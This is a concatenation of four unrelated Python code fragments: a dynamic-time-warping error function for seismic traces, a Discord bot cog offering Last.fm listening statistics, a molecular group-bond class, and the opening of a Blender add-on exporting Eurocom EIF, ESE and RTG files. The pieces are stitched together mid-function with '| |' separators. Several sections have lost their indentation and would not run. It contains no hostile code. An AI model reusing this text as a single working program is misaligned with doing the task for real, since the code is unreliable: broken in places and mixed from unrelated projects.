        w = scipy.signal.windows.hann(window_len).astype('complex')
    y = np.convolve(w / w.sum(), s, mode='valid')
    # Trim the border samples introduced by the extension.
    return y[half_win:len(y) - half_win]
def nextpow2(x):
    """Return the exponent of the next power of 2 greater than or equal to |x|."""
    magnitude = np.abs(x)
    return int(np.ceil(np.log2(magnitude)))
def getCoherence(dcs, ds1, ds2):
    """
    Cross coherence between reference and current waveforms, following
    equation A3 in Clark et al., 2011.

    Parameters
    --------------
    dcs: amplitude of the cross spectrum
    ds1: amplitude of the spectrum of the current waveform
    ds2: amplitude of the spectrum of the reference waveform

    RETURNS:
    ------------------
    coh: coherency array used to estimate the robustness of the cross spectrum
    """
    npts = len(dcs)
    coh = np.zeros(npts).astype('complex')
    # Only divide where both spectra have non-zero amplitude;
    # everywhere else the coherence stays 0.
    ok = np.argwhere((np.abs(ds1) > 0) & (np.abs(ds2) > 0))
    coh[ok] = dcs[ok] / (ds1[ok] * ds2[ok])
    # Cap the coherence at unity.
    coh[coh > (1.0 + 0j)] = 1.0 + 0j
    return coh
def computeErrorFunction(u1, u0, nSample, lag, norm='L2'):
    """
    Compute the alignment-error matrix used in DTW (equation 1 in Hale, 2013).

    Parameters
    --------------
    u1: trace that we want to warp; size = (nsamp,1)
    u0: reference trace to compare with: size = (nsamp,1)
    nSample: number of points to compare in the traces
    lag: maximum lag in sample number to search
    norm: 'L2' or 'L1' (default is 'L2')

    RETURNS:
    ------------------
    err: the 2D error function; size = (nsamp, 2*lag+1)

    Original by <NAME>
    Last modified by <NAME> (25 Feb. 2015)
    Translated to python by <NAME> (17 Aug. 2018)
    """
    if lag >= nSample:
        raise ValueError('computeErrorFunction:lagProblem','lag must be smaller than nSample')
    # One column per lag value, one row per sample.
    err = np.zeros([nSample, 2 * lag + 1])
    # Fill in the raw differences; corners (out-of-range shifts) stay 0 for now.
    for shift in np.arange(-lag, lag + 1):
        col = shift + lag
        for samp in range(nSample):
            if 0 <= samp + shift < nSample:
                err[samp, col] = u1[samp] - u0[samp + shift]
    # Apply the chosen norm to the differences.
    if norm == 'L2':
        err = err ** 2
    elif norm == 'L1':
        err = np.abs(err)
    # Fix the corners with constant extrapolation from the nearest valid entry.
    for shift in np.arange(-lag, lag + 1):
        col = shift + lag
        for samp in range(nSample):
            if samp + shift < 0:
                err[samp, col] = err[-shift, col]
            elif samp + shift > nSample - 1:
                err[samp, col] = err[nSample - shift - 1, col]
    return err
def accumulateErrorFunction(dir, err, nSample, lag, b ):
"""
accumulation of the error, which follows the equation 6 in Hale, 2013.
Parameters
--------------
dir: accumulation direction ( dir > 0 = forward in time, dir <= 0 = backward in time)
err: the 2D error function; size = (nsamp,2*lag+1)
nSample: numer of points to compare in the traces
lag: maximum lag in sample number to search
b: strain limit (integer value | |
import asyncio
import html
import io
import math
import os
import random
import re
import urllib.parse
import aiohttp
import arrow
import colorgram
import discord
import kdtree
from bs4 import BeautifulSoup
from discord.ext import commands
from PIL import Image
from modules import emojis, exceptions, util
LASTFM_APPID = os.environ.get("LASTFM_APIKEY")
LASTFM_TOKEN = os.environ.get("LASTFM_SECRET")
GOOGLE_API_KEY = os.environ.get("GOOGLE_KEY")
AUDDIO_TOKEN = os.environ.get("AUDDIO_TOKEN")
MISSING_IMAGE_HASH = "2a96cbd8b46e442fc41c2b86b821562f"
def is_small_server():
    """Command check that restricts a command to guilds with at most 150 linked Last.fm users."""
    async def predicate(ctx):
        # Count this guild's members that have a Last.fm username saved.
        users = await ctx.bot.db.execute(
            """
            SELECT count(*) FROM user_settings WHERE user_id IN %s
            AND lastfm_username IS NOT NULL
            """,
            [user.id for user in ctx.guild.members],
            one_value=True,
        )
        if users > 150:
            raise exceptions.ServerTooBig(ctx.guild.member_count)
        return True

    return commands.check(predicate)
class AlbumColorNode:
    """A kd-tree point pairing an RGB tuple with the album art URL it came from.

    Implements the sequence protocol (__len__/__getitem__) so kdtree can
    treat the node as a 3-dimensional point.
    """

    def __init__(self, rgb, image_url):
        self.rgb = rgb
        self.data = image_url

    def __len__(self):
        # Dimensionality of the point (3 for RGB).
        return len(self.rgb)

    def __getitem__(self, i):
        # Expose individual color channels by index.
        return self.rgb[i]

    def __str__(self):
        return "rgb" + str(self.rgb)

    def __repr__(self):
        return "AlbumColorNode({}, {})".format(self.rgb, self.data)
class LastFm(commands.Cog):
"""LastFM commands"""
def __init__(self, bot):
    """Set up the cog: colors, album-art URL templates and the chart HTML template."""
    self.bot = bot
    self.icon = "🎵"
    # Last.fm brand red, used as a fallback embed color.
    self.lastfm_red = "b90000"
    # The same cover image at increasing resolutions; format with the image hash.
    self.cover_base_urls = [
        "https://lastfm.freetls.fastly.net/i/u/34s/{0}",
        "https://lastfm.freetls.fastly.net/i/u/64s/{0}",
        "https://lastfm.freetls.fastly.net/i/u/174s/{0}",
        "https://lastfm.freetls.fastly.net/i/u/300x300/{0}",
        "https://lastfm.freetls.fastly.net/i/u/{0}",
    ]
    # Pre-minified HTML template used to render chart images; newlines
    # stripped so it can be passed around as a single line.
    with open("html/fm_chart.min.html", "r", encoding="utf-8") as file:
        self.chart_html = file.read().replace("\n", "")
@commands.group(case_insensitive=True)
async def fm(self, ctx):
    """Last.fm command group; resolves the target user's username before any subcommand runs."""
    # Attaches the Last.fm username / target info onto ctx for subcommands.
    await username_to_ctx(ctx)
    if ctx.invoked_subcommand is None:
        await util.command_group_help(ctx)
@fm.command()
async def set(self, ctx, username):
    """Save your Last.fm username."""
    if ctx.foreign_target:
        raise exceptions.Warning("You cannot set Last.fm username for someone else!")

    # Validate the username against the Last.fm API before saving.
    content = await self.get_userinfo_embed(username)
    if content is None:
        raise exceptions.Warning(f"Last.fm profile `{username}` was not found")

    # Upsert: overwrite any previously saved username.
    await self.bot.db.execute(
        """
        INSERT INTO user_settings (user_id, lastfm_username)
            VALUES (%s, %s)
        ON DUPLICATE KEY UPDATE
            lastfm_username = VALUES(lastfm_username)
        """,
        ctx.author.id,
        username,
    )
    await ctx.send(
        f"{ctx.author.mention} Last.fm username saved as `{username}`", embed=content
    )
@fm.command()
async def unset(self, ctx):
    """Unlink your Last.fm."""
    if ctx.foreign_target:
        raise exceptions.Warning("You cannot unset someone else's Last.fm username!")

    # Upsert with NULL: clears the stored username while keeping the row.
    await self.bot.db.execute(
        """
        INSERT INTO user_settings (user_id, lastfm_username)
            VALUES (%s, %s)
        ON DUPLICATE KEY UPDATE
            lastfm_username = VALUES(lastfm_username)
        """,
        ctx.author.id,
        None,
    )
    await ctx.send(":broken_heart: Removed your Last.fm username from the database")
@fm.command()
async def profile(self, ctx):
    """Last.fm profile."""
    # ctx.username is resolved by the fm group before subcommands run.
    await ctx.send(embed=await self.get_userinfo_embed(ctx.username))
@fm.command(aliases=["yt"])
async def youtube(self, ctx):
    """See your current song on youtube."""
    data = await self.api_request(
        {"user": ctx.username, "method": "user.getrecenttracks", "limit": 1}
    )

    tracks = data["recenttracks"]["track"]
    if not tracks:
        raise exceptions.Info("You have not listened to anything yet!")

    username = data["recenttracks"]["@attr"]["user"]
    artist = tracks[0]["artist"]["#text"]
    track = tracks[0]["name"]

    # "nowplaying" attribute marks a scrobble still in progress.
    state = "Most recent track"
    track_attr = tracks[0].get("@attr")
    if track_attr is not None and "nowplaying" in track_attr:
        state = "Now Playing"

    # Query the YouTube Data API for the best matching video.
    url = "https://www.googleapis.com/youtube/v3/search"
    params = {
        "part": "snippet",
        "type": "video",
        "maxResults": 1,
        "q": f"{artist} {track}",
        "key": GOOGLE_API_KEY,
    }

    async with aiohttp.ClientSession() as session:
        async with session.get(url, params=params) as response:
            data = await response.json()

    # Robustness fix: the search can legitimately return zero items (or an
    # error payload without "items"); fail with a clear message instead of
    # an unhandled IndexError/KeyError.
    items = data.get("items")
    if not items:
        raise exceptions.Warning(f"Could not find `{artist} {track}` on YouTube!")

    video_id = items[0]["id"]["videoId"]
    video_url = f"https://youtube.com/watch?v={video_id}"

    await ctx.send(f"**{username} — {state}** :cd:\n{video_url}")
@fm.command(aliases=["np", "no"])
async def nowplaying(self, ctx):
    """Your currently playing song."""
    data = await self.api_request(
        {"user": ctx.username, "method": "user.getrecenttracks", "limit": 1}
    )

    tracks = data["recenttracks"]["track"]
    if not tracks:
        raise exceptions.Info("You have not listened to anything yet!")

    artist = tracks[0]["artist"]["#text"]
    album = tracks[0]["album"]["#text"]
    track = tracks[0]["name"]
    # Last image entry is the largest resolution available.
    image_url = tracks[0]["image"][-1]["#text"]

    content = discord.Embed()
    content.colour = await self.cached_image_color(image_url)
    content.description = f":cd: **{util.escape_md(album)}**"
    content.title = f"**{util.escape_md(artist)} — *{util.escape_md(track)}* **"
    content.set_thumbnail(url=image_url)

    # tags and playcount (best-effort; ignored when unavailable)
    trackdata = await self.api_request(
        {"user": ctx.username, "method": "track.getInfo", "artist": artist, "track": track},
        ignore_errors=True,
    )
    if trackdata is not None:
        tags = []
        try:
            trackdata = trackdata["track"]
            playcount = int(trackdata["userplaycount"])
            if playcount > 0:
                content.description += f"\n> {playcount} {format_plays(playcount)}"
            for tag in trackdata["toptags"]["tag"]:
                tags.append(tag["name"])
            content.set_footer(text=", ".join(tags))
        except (KeyError, TypeError):
            pass

    # play state: "nowplaying" attribute marks a scrobble in progress;
    # otherwise show when the last track was scrobbled.
    np = "@attr" in tracks[0] and "nowplaying" in tracks[0]["@attr"]
    state = "> Now Playing" if np else "II Last track"
    if not np:
        content.timestamp = arrow.get(int(tracks[0]["date"]["uts"])).datetime

    content.set_author(
        name=f"{util.displayname(ctx.usertarget, escape=False)} {state}",
        icon_url=ctx.usertarget.avatar_url,
    )
    await ctx.send(embed=content)
@fm.command(aliases=["ta"])
async def topartists(self, ctx, *args):
    """
    Most listened artists.

    Usage:
        >fm topartists [timeframe] [amount]
    """
    arguments = parse_arguments(args)
    # "today" is not a native Last.fm period; derive it from recent scrobbles.
    if arguments["period"] == "today":
        data = await self.custom_period(ctx.username, "artist")
    else:
        data = await self.api_request(
            {
                "user": ctx.username,
                "method": "user.gettopartists",
                "period": arguments["period"],
                "limit": arguments["amount"],
            }
        )
    user_attr = data["topartists"]["@attr"]
    artists = data["topartists"]["artist"][: arguments["amount"]]

    if not artists:
        raise exceptions.Info("You have not listened to anything yet!")

    rows = []
    for i, artist in enumerate(artists, start=1):
        name = util.escape_md(artist["name"])
        plays = artist["playcount"]
        rows.append(f"`#{i:2}` **{plays}** {format_plays(plays)} : **{name}**")

    # Thumbnail: image of the #1 artist.
    image_url = await self.get_artist_image(artists[0]["name"])
    formatted_timeframe = humanized_period(arguments["period"]).capitalize()

    content = discord.Embed()
    content.colour = await self.cached_image_color(image_url)
    content.set_thumbnail(url=image_url)
    content.set_footer(text=f"Total unique artists: {user_attr['total']}")
    content.set_author(
        name=f"{util.displayname(ctx.usertarget, escape=False)} — {formatted_timeframe} top artists",
        icon_url=ctx.usertarget.avatar_url,
    )

    await util.send_as_pages(ctx, content, rows, 15)
@fm.command(aliases=["talb"])
async def topalbums(self, ctx, *args):
    """
    Most listened albums.

    Usage:
        >fm topalbums [timeframe] [amount]
    """
    arguments = parse_arguments(args)
    # "today" is not a native Last.fm period; derive it from recent scrobbles.
    if arguments["period"] == "today":
        data = await self.custom_period(ctx.username, "album")
    else:
        data = await self.api_request(
            {
                "user": ctx.username,
                "method": "user.gettopalbums",
                "period": arguments["period"],
                "limit": arguments["amount"],
            }
        )
    user_attr = data["topalbums"]["@attr"]
    albums = data["topalbums"]["album"][: arguments["amount"]]

    if not albums:
        raise exceptions.Info("You have not listened to anything yet!")

    rows = []
    for i, album in enumerate(albums, start=1):
        name = util.escape_md(album["name"])
        artist_name = util.escape_md(album["artist"]["name"])
        plays = album["playcount"]
        rows.append(
            f"`#{i:2}` **{plays}** {format_plays(plays)} : **{artist_name}** — ***{name}***"
        )

    # Thumbnail: cover of the #1 album (last image entry = largest size).
    image_url = albums[0]["image"][-1]["#text"]
    formatted_timeframe = humanized_period(arguments["period"]).capitalize()

    content = discord.Embed()
    content.colour = await self.cached_image_color(image_url)
    content.set_thumbnail(url=image_url)
    content.set_footer(text=f"Total unique albums: {user_attr['total']}")
    content.set_author(
        name=f"{util.displayname(ctx.usertarget, escape=False)} — {formatted_timeframe} top albums",
        icon_url=ctx.usertarget.avatar_url,
    )

    await util.send_as_pages(ctx, content, rows, 15)
@fm.command(aliases=["tt"])
async def toptracks(self, ctx, *args):
    """
    Most listened tracks.

    Usage:
        >fm toptracks [timeframe] [amount]
    """
    arguments = parse_arguments(args)
    # "today" is not a native Last.fm period; derive it from recent scrobbles.
    if arguments["period"] == "today":
        data = await self.custom_period(ctx.username, "track")
    else:
        data = await self.api_request(
            {
                "user": ctx.username,
                "method": "user.gettoptracks",
                "period": arguments["period"],
                "limit": arguments["amount"],
            }
        )
    user_attr = data["toptracks"]["@attr"]
    tracks = data["toptracks"]["track"][: arguments["amount"]]

    if not tracks:
        raise exceptions.Info("You have not listened to anything yet!")

    rows = []
    for i, track in enumerate(tracks, start=1):
        # Thumbnail: fetched once, from the #1 track's artist.
        if i == 1:
            image_url = await self.get_artist_image(tracks[0]["artist"]["name"])
        name = util.escape_md(track["name"])
        artist_name = util.escape_md(track["artist"]["name"])
        plays = track["playcount"]
        rows.append(
            f"`#{i:2}` **{plays}** {format_plays(plays)} : **{artist_name}** — ***{name}***"
        )

    formatted_timeframe = humanized_period(arguments["period"]).capitalize()

    content = discord.Embed()
    content.colour = await self.cached_image_color(image_url)
    content.set_thumbnail(url=image_url)
    content.set_footer(text=f"Total unique tracks: {user_attr['total']}")
    content.set_author(
        name=f"{util.displayname(ctx.usertarget, escape=False)} — {formatted_timeframe} top tracks",
        icon_url=ctx.usertarget.avatar_url,
    )

    await util.send_as_pages(ctx, content, rows, 15)
@fm.command(aliases=["recents", "re"])
async def recent(self, ctx, size="15"):
    """Recently listened to tracks."""
    # Tolerate non-numeric input; fall back to the default page size.
    try:
        size = abs(int(size))
    except ValueError:
        size = 15

    data = await self.api_request(
        {"user": ctx.username, "method": "user.getrecenttracks", "limit": size}
    )
    user_attr = data["recenttracks"]["@attr"]
    tracks = data["recenttracks"]["track"][:size]

    if not tracks:
        raise exceptions.Info("You have not listened to anything yet!")

    rows = []
    for track in tracks:
        name = util.escape_md(track["name"])
        artist_name = util.escape_md(track["artist"]["#text"])
        rows.append(f"**{artist_name}** — ***{name}***")

    # Thumbnail: cover of the most recent track (last entry = largest size).
    image_url = tracks[0]["image"][-1]["#text"]

    content = discord.Embed()
    content.colour = await self.cached_image_color(image_url)
    content.set_thumbnail(url=image_url)
    content.set_footer(text=f"Total scrobbles: {user_attr['total']}")
    content.set_author(
        name=f"{util.displayname(ctx.usertarget, escape=False)} — Recent tracks",
        icon_url=ctx.usertarget.avatar_url,
    )

    await util.send_as_pages(ctx, content, rows, 15)
@fm.command()
async def last(self, ctx, timeframe):
    """
    Your week/month/year listening overview.

    Usage:
        >fm last week
        >fm last month (requires lastfm pro)
        >fm last year
    """
    timeframe = timeframe.lower()
    if timeframe not in ["week", "month", "year"]:
        raise exceptions.Info("Available timeframes: `[ week | month | year ]`")

    # Last.fm API changes broke the month/year reports; only weekly works.
    if timeframe != "week":
        raise exceptions.Warning(
            "Only the weekly listening report is currently available due to a Last.fm change, sorry for the inconvenience!"
        )

    await self.listening_report(ctx, timeframe)
@fm.command()
async def artist(self, ctx, timeframe, datatype, *, artistname=""):
"""
Artist specific data.
Usage:
>fm artist [timeframe] toptracks <artist name>
>fm artist [timeframe] topalbums <artist name>
>fm artist [timeframe] overview <artist name>
"""
period = get_period(timeframe)
if period in [None, "today"]:
artistname = " ".join([datatype, artistname]).strip()
datatype = timeframe
period = "overall"
artistname = remove_mentions(artistname)
if artistname.lower() == "np":
artistname = (await self.getnowplaying(ctx))["artist"]
if artistname is None:
raise exceptions.Warning("Could not get currently playing artist!")
if artistname == "":
return await ctx.send("Missing artist name!")
if datatype in ["toptracks", "tt", "tracks", "track"]:
datatype = "tracks"
elif datatype in ["topalbums", "talb", "albums", "album"]:
datatype = "albums"
elif datatype in ["overview", "stats", "ov"]:
return await self.artist_overview(ctx, period, artistname)
else:
return await util.send_command_help(ctx)
artist, data = await self.artist_top(ctx, period, artistname, datatype)
if artist is None or not data:
artistname = util.escape_md(artistname)
if period == "overall":
return await ctx.send(f"You have never listened to **{artistname}**!")
return await ctx.send(
f"You have not listened to **{artistname}** in the past {period}s!"
)
total = 0
rows = []
for i, (name, playcount) in enumerate(data, start=1):
rows.append(
f"`#{i:2}` **{playcount}** {format_plays(playcount)} — **{util.escape_md(name)}**"
)
total += playcount
artistname = urllib.parse.quote_plus(artistname)
content = discord.Embed()
content.set_thumbnail(url=artist["image_url"])
content.colour = await self.cached_image_color(artist["image_url"])
content.set_author(
name=f"{util.displayname(ctx.usertarget, escape=False)} — "
+ (f"{humanized_period(period)} " if period != "overall" else | |
defaultAtom.label)
#For some reason the default when no lone pairs is set to -100,
#Based on git history, it is probably because RDKit requires a number instead of None
#Instead we will set it to 0 here
#Hard code charge for a few atomtypes
if atomtype in [atomTypes[x] for x in ['N5d', 'N5dd', 'N5t', 'N5b', 'N5s']]:
newAtom.lonePairs = 0
newAtom.charge = 1
elif atomtype in [atomTypes[x] for x in ['N1d']]:
newAtom.charge = -1
elif newAtom.lonePairs == -100:
newAtom.lonePairs = defaultLonePairs[newAtom.symbol]
return newAtom
################################################################################
class GroupBond(Edge):
    """
    A bond group. This class is based on the :class:`Bond` class, except that
    all attributes are lists rather than individual values. The allowed bond
    types are given :ref:`here <bond-types>`. The attributes are:

    =================== =================== ====================================
    Attribute           Type                Description
    =================== =================== ====================================
    `order`             ``list``            The allowed bond orders (as character strings)
    =================== =================== ====================================

    Each list represents a logical OR construct, i.e. a bond will match the
    group if it matches *any* item in the list.
    """

    def __init__(self, atom1, atom2, order=None):
        """
        Create a bond group between `atom1` and `atom2`.

        `order` may be a list of strings ('S', 'D', 'T', 'B') or a list of
        numbers (1, 2, 3, 1.5); a mixed list raises :class:`ActionError`.
        """
        Edge.__init__(self, atom1, atom2)
        # All strings -> convert to numeric orders; some-but-not-all strings
        # is ambiguous and rejected; otherwise assume the list is numeric.
        if order is not None and all([isinstance(oneOrder,str) for oneOrder in order]):
            self.setOrderStr(order)
        elif order is not None and any([isinstance(oneOrder,str) for oneOrder in order]):
            raise ActionError('order list given {} does not consist of only strings or only numbers'.format(order))
        else:
            self.order = order or []

    def __str__(self):
        """
        Return a human-readable string representation of the object.
        """
        return str(self.order)

    def __repr__(self):
        """
        Return a representation that can be used to reconstruct the object.
        """
        return "<GroupBond {0!r}>".format(self.order)

    def __reduce__(self):
        """
        A helper function used when pickling an object.
        """
        return (GroupBond, (self.vertex1, self.vertex2, self.order))

    def copy(self):
        """
        Return a deep copy of the :class:`GroupBond` object. Modifying the
        attributes of the copy will not affect the original.
        """
        # order[:] copies the list so the original's orders are not shared.
        return GroupBond(self.vertex1, self.vertex2, self.order[:])

    def getOrderStr(self):
        """
        returns a list of strings representing the bond order
        """
        values = []
        for value in self.order:
            # 1/2/3/1.5 map to Single/Double/Triple/Benzene respectively.
            if value == 1:
                values.append('S')
            elif value == 2:
                values.append('D')
            elif value == 3:
                values.append('T')
            elif value == 1.5:
                values.append('B')
            else:
                raise TypeError('Bond order number {} is not hardcoded as a string'.format(value))
        return values

    def setOrderStr(self, newOrder):
        """
        set the bond order using a valid bond-order character list
        """
        values = []
        for value in newOrder:
            if value == 'S':
                values.append(1)
            elif value == 'D':
                values.append(2)
            elif value == 'T':
                values.append(3)
            elif value == 'B':
                values.append(1.5)
            else:
                raise TypeError('Bond order {} is not hardcoded into this method'.format(value))
        self.order = values

    def getOrderNum(self):
        """
        returns the bond order as a list of numbers
        """
        return self.order

    def setOrderNum(self, newOrder):
        """
        change the bond order with a list of numbers
        """
        self.order = newOrder

    def isSingle(self, wildcards = False):
        """
        Return ``True`` if the bond represents a single bond or ``False`` if
        not. If `wildcards` is ``False`` we return False anytime there is more
        than one bond order, otherwise we return ``True`` if any of the options
        are single.

        NOTE: we can replace the absolute value relation with math.isclose when
        we swtich to python 3.5+
        """
        if wildcards:
            # Tolerance-compare against 1; for-else returns False only when
            # no order in the list matched.
            for order in self.order:
                if abs(order-1) <= 1e-9:
                    return True
            else: return False
        else:
            # Exact match requires a single, unambiguous order entry.
            return abs(self.order[0]-1) <= 1e-9 and len(self.order) == 1

    def isDouble(self, wildcards = False):
        """
        Return ``True`` if the bond represents a double bond or ``False`` if
        not. If `wildcards` is ``False`` we return False anytime there is more
        than one bond order, otherwise we return ``True`` if any of the options
        are double.
        """
        if wildcards:
            for order in self.order:
                if abs(order-2) <= 1e-9:
                    return True
            else: return False
        else:
            return abs(self.order[0]-2) <= 1e-9 and len(self.order) == 1

    def isTriple(self, wildcards = False):
        """
        Return ``True`` if the bond represents a triple bond or ``False`` if
        not. If `wildcards` is ``False`` we return False anytime there is more
        than one bond order, otherwise we return ``True`` if any of the options
        are triple.
        """
        if wildcards:
            for order in self.order:
                if abs(order-3) <= 1e-9:
                    return True
            else: return False
        else:
            return abs(self.order[0]-3) <= 1e-9 and len(self.order) == 1

    def isBenzene(self, wildcards = False):
        """
        Return ``True`` if the bond represents a benzene bond or ``False`` if
        not. If `wildcards` is ``False`` we return False anytime there is more
        than one bond order, otherwise we return ``True`` if any of the options
        are benzene
        """
        if wildcards:
            for order in self.order:
                if abs(order-1.5) <= 1e-9:
                    return True
            else: return False
        else:
            return abs(self.order[0]-1.5) <= 1e-9 and len(self.order) == 1

    def __changeBond(self, order):
        """
        Update the bond group as a result of applying a CHANGE_BOND action,
        where `order` specifies whether the bond is incremented or decremented
        in bond order. `order` is normally 1 or -1, but can be any value
        """
        newOrder = [value + order for value in self.order]
        # Reject any resulting order outside the physically meaningful 0..3.
        if any([value < 0 or value > 3 for value in newOrder]):
            raise ActionError('Unable to update Bond due to CHANGE_BOND action: Invalid resulting order "{0}".'.format(newOrder))
        # Set the new bond orders, removing any duplicates
        self.order = list(set(newOrder))

    def applyAction(self, action):
        """
        Update the bond group as a result of applying `action`, a tuple
        containing the name of the reaction recipe action along with any
        required parameters. The available actions can be found
        :ref:`here <reaction-recipe-actions>`.
        """
        # Only CHANGE_BOND is meaningful for a bond; action[2] is the delta.
        if action[0].upper() == 'CHANGE_BOND':
            self.__changeBond(action[2])
        else:
            raise ActionError('Unable to update GroupBond: Invalid action {0}".'.format(action))

    def equivalent(self, other):
        """
        Returns ``True`` if `other` is equivalent to `self` or ``False`` if not,
        where `other` can be either an :class:`Bond` or an :class:`GroupBond`
        object.
        """
        cython.declare(gb=GroupBond)
        if not isinstance(other, GroupBond):
            # Let the equivalent method of other handle it
            # We expect self to be a Bond object, but can't test for it here
            # because that would create an import cycle
            return other.equivalent(self)
        gb = other

        cython.declare(order1=float, order2=float)
        # Compare two bond groups for equivalence
        # Each atom type in self must have an equivalent in other (and vice versa)
        # for-else: the else fires only when the inner loop found no match.
        for order1 in self.order:
            for order2 in gb.order:
                if order1 == order2: break
            else:
                return False
        for order1 in gb.order:
            for order2 in self.order:
                if order1 == order2: break
            else:
                return False
        # Otherwise the two bond groups are equivalent
        return True

    def isSpecificCaseOf(self, other):
        """
        Returns ``True`` if `other` is the same as `self` or is a more
        specific case of `self`. Returns ``False`` if some of `self` is not
        included in `other` or they are mutually exclusive.
        """
        cython.declare(gb=GroupBond)
        if not isinstance(other, GroupBond):
            # Let the isSpecificCaseOf method of other handle it
            # We expect self to be a Bond object, but can't test for it here
            # because that would create an import cycle
            return other.isSpecificCaseOf(self)
        gb = other

        cython.declare(order1=float, order2=float)
        # Compare two bond groups for equivalence
        # Each atom type in self must have an equivalent in other
        # (one-directional check, unlike equivalent() above)
        for order1 in self.order: # all these must match
            for order2 in gb.order: # can match any of these
                if order1 == order2: break
            else:
                return False
        # Otherwise self is in fact a specific case of other
        return True

    def makeBond(self, molecule, atom1, atom2):
        """
        Creates a :class: Bond between atom1 and atom2 analogous to self

        The intended input arguments should be class :Atom: not class :GroupAtom:
        Args:
            atom1: First :class: Atom the bond connects
            atom2: Second :class: Atom the bond connects
        """
        # NOTE(review): `mol` is presumably the molecule module imported at
        # the top of this file — confirm. Only the first allowed order is
        # used when materialising the concrete bond.
        newBond = mol.Bond(atom1, atom2, order = self.order[0])
        molecule.addBond(newBond)
class Group(Graph):
"""
A representation of a molecular substructure group using a graph data
type, extending the :class:`Graph` class. The `atoms` and `bonds` attributes
are aliases for the `vertices` and `edges` attributes, and store
:class:`GroupAtom` and :class:`GroupBond` objects, respectively.
Corresponding alias methods have also been provided.
"""
def __init__(self, atoms=None, multiplicity=None):
Graph.__init__(self, atoms)
self.multiplicity = multiplicity if multiplicity else []
self.update()
def __reduce__(self):
"""
A helper function used when pickling an object.
"""
return (Group, (self.vertices,))
def | |
# repository: Swyter/sphinx-euroland
# Copyright (c) 2020-2021 Swyter <<EMAIL>>
# SPDX-License-Identifier: Zlib
# Blender add-on registration metadata (read by Blender's add-on manager).
bl_info = {
    'name': 'Eurocom 3D formats for Sphinx and the Cursed Mummy™',
    'author': 'Swyter, for THQ Nordic GmbH',
    'version': (2020, 10, 10),
    'blender': (2, 81, 6),
    'location': 'File > Import-Export',
    'description': 'Export and import EIF, ESE and RTG files compatible with Euroland.',
    # swy: the backslash in the shruggie must be escaped; a bare '\_' is an
    #      invalid escape sequence and warns on modern Python (same string value).
    'warning': 'Importing still doesn\'t work, export in progress. ¯\\_(ツ)_/¯',
    'doc_url': 'https://sphinxandthecursedmummy.fandom.com/wiki/Technical',
    'tracker_url': 'https://discord.gg/sphinx',
    'support': 'COMMUNITY',
    'category': 'Import-Export',
}
import os
import bpy
import bpy.utils.previews
import bmesh
from bpy.props import(
BoolProperty,
FloatProperty,
StringProperty,
EnumProperty,
)
from bpy_extras.io_utils import(
ImportHelper,
ExportHelper,
orientation_helper,
path_reference_mode,
axis_conversion,
)
#===============================================================================================
# IMPORTERS (TO DO)
#===============================================================================================
@orientation_helper(axis_forward='-Z', axis_up='Y')
class ImportRTG(bpy.types.Operator, ImportHelper):
    """Load a dynamic Maya Euroland file; for animations, scripts and maps"""
    bl_idname = "import_scene.rtg"
    bl_label = "Import RTG"
    bl_options = {'PRESET', 'UNDO'}

    # File-browser filter: only show .rtg files.
    filename_ext = ".rtg"
    filter_glob: StringProperty(default="*.rtg", options={'HIDDEN'})

    def execute(self, context):
        # NOTE(review): assumes an active object exists; in practice the
        # operator is unreachable because poll() returns False below.
        print("Selected: " + context.active_object.name)
        from . import import_rtg
        return import_rtg.load(context, self.filepath)

    def draw(self, context):
        # No custom UI; layout is provided by sub-panels/defaults.
        pass

    @classmethod
    def poll(cls, context):
        # Importing is not implemented yet; keep the menu entry greyed out.
        return False
@orientation_helper(axis_forward='-Z', axis_up='Y')
class ImportEIF(bpy.types.Operator, ImportHelper):
    """Load a static 3ds Max Euroland file, for scenes and entities"""
    bl_idname = "import_scene.eif"
    bl_label = "Import EIF"
    bl_options = {'PRESET', 'UNDO'}

    # File-browser filter: only show .eif files.
    filename_ext = ".eif"
    filter_glob: StringProperty(default="*.eif", options={'HIDDEN'})

    def execute(self, context):
        # NOTE(review): assumes an active object exists; in practice the
        # operator is unreachable because poll() returns False below.
        print("Selected: " + context.active_object.name)
        from . import import_eif
        return import_eif.load(context, self.filepath)

    def draw(self, context):
        # No custom UI; layout is provided by sub-panels/defaults.
        pass

    @classmethod
    def poll(cls, context):
        # Importing is not implemented yet; keep the menu entry greyed out.
        return False
@orientation_helper(axis_forward='-Z', axis_up='Y')
class ImportESE(bpy.types.Operator, ImportHelper):
    """Load a dynamic 3ds Max Euroland file; for cutscenes and maps"""
    bl_idname = "import_scene.ese"
    bl_label = "Import ESE"
    bl_options = {'PRESET', 'UNDO'}

    # File-browser filter: only show .ese files.
    filename_ext = ".ese"
    filter_glob: StringProperty(default="*.ese", options={'HIDDEN'})

    def execute(self, context):
        # NOTE(review): assumes an active object exists; in practice the
        # operator is unreachable because poll() returns False below.
        print("Selected: " + context.active_object.name)
        from . import import_ese
        return import_ese.load(context, self.filepath)

    def draw(self, context):
        # No custom UI; layout is provided by sub-panels/defaults.
        pass

    @classmethod
    def poll(cls, context):
        # Importing is not implemented yet; keep the menu entry greyed out.
        return False
#===============================================================================================
# EXPORTERS (ON IT)
#===============================================================================================
@orientation_helper(axis_forward='Z', axis_up='Y')
class ExportRTG(bpy.types.Operator, ExportHelper):
    """Save a dynamic Maya Euroland file; for animations, scripts and maps"""
    bl_idname = "export_scene.rtg"
    bl_label = 'Export RTG'
    bl_options = {'PRESET'}

    # File-browser filter: only show .rtg files.
    filename_ext = ".rtg"
    filter_glob: StringProperty(default="*.rtg", options={'HIDDEN'})

    path_mode: path_reference_mode
    check_extension = True

    def execute(self, context):
        # Delegate the actual writing to the export_rtg module.
        from . import export_rtg
        return export_rtg.save(context, self.filepath)

    def draw(self, context):
        # No custom UI; layout is provided by sub-panels/defaults.
        pass
@orientation_helper(axis_forward='Z', axis_up='Y')
class ExportEIF(bpy.types.Operator, ExportHelper):
    """Save a static 3ds Max Euroland file, for scenes and entities"""
    bl_idname = "export_scene.eif"
    bl_label = 'Export EIF'
    bl_options = {'PRESET'}

    # File-browser filter: only show .eif files.
    filename_ext = ".eif"
    filter_glob: StringProperty(default="*.eif", options={'HIDDEN'})

    #Output Options
    Output_Map: BoolProperty(
        name="Output as a Map",
        description="Output scene as a new map for EuroLand.",
        default=False,
    )
    Output_Transform: BoolProperty(
        name="Transform Objects to (0,0,0)",
        description="Transform objects to position (0,0,0).",
        default=False,
    )

    #Scale Options
    global_scale: FloatProperty(
        name="Scale",
        min=0.01,
        max=1000.0,
        default=1.0,
    )

    path_mode: path_reference_mode
    check_extension = True

    def execute(self, context):
        from mathutils import Matrix
        from . import export_eif
